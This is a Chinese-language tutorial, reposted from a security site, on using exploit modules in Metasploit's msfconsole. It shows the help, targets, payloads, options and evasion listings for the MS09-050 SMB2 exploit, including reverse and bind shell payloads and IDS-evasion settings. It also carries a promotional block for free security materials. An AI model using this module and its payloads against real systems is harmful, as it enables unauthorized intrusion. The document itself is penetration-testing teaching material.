metasploit使用详解（Metasploit如何使用Exploits漏洞）

在Metasploit中选择一个漏洞利用程序将'exploit'和'check'命令添加到msfconsole，我来为大家讲解一下关于metasploit使用详解?跟着小编一起来看一看吧!

metasploit使用详解

在Metasploit中选择一个漏洞利用程序将'exploit'和'check'命令添加到msfconsole。

msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index msf exploit(ms09_050_smb2_negotiate_func_index) > help ...略... Exploit 命令 ================ 命 令 描 述 ------- ----------- check 检查目标是否易受攻击 exploit 启动漏洞利用尝试 pry 在当前模块上打开一个Pry会话 rcheck 重新加载模块并检查目标是否存在漏洞 reload 只需重新加载模块 rerun 重新运行exploit（漏洞）的别名 rexploit 重新加载模块并启动漏洞攻击尝试 run 运行exploit（漏洞）的别名 msf exploit(ms09_050_smb2_negotiate_func_index) >

使用exploits（漏洞）还会为'show'命令添加更多选项。

MSF Exploit Targets（漏洞目标）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show targets Exploit targets: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86)

MSF Exploit Payloads（漏洞有效载荷）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop windows/adduser normal Windows Execute net user /ADD ...略...

①　2000多本网络安全系列电子书

②　网络安全标准题库资料

③　项目源码

④　网络安全基础入门、Linux、web安全、攻防视频

⑤ 网络安全学习路线

免费领取私信”安全“

MSF Exploit Options（漏洞选项）:

msf exploit(ms09_050_smb2_negotiate_func_index) > show options Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.136 yes The target address RPORT 445 yes The target port (TCP) WAIT 180 yes The number of seconds to wait for the attack to complete. Exploit target: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86)

Advanced（高级）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show advanced Module advanced options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection ContextInformationFile no The information file that contains context information DisablePayloadHandler false no Disable the handler code for the selected payload EnableContextEncoding false no Use transient context when encoding payloads ...略...

Evasion（越狱）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show evasion Module evasion options: Name Current Setting Required Description ---- --------------- -------- ----------- SMB::obscure_trans_pipe_level 0 yes Obscure PIPE string in TransNamedPipe (level 0-3) SMB::pad_data_level 0 yes Place extra padding between headers and data (level 0-3) SMB::pad_file_level 0 yes Obscure path names used in open/create (level 0-3) SMB::pipe_evasion false yes Enable segmented read/writes for SMB Pipes SMB::pipe_read_max_size 1024 yes Maximum buffer size for pipe reads SMB::pipe_read_min_size 1 yes Minimum buffer size for pipe reads SMB::pipe_write_max_size 1024 yes Maximum buffer size for pipe writes SMB::pipe_write_min_size 1 yes Minimum buffer size for pipe writes TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable) TCP::send_delay 0 no Delays inserted before every send. (0 = disable) 转:https://www.fujieace.com/metasploit/exploits.html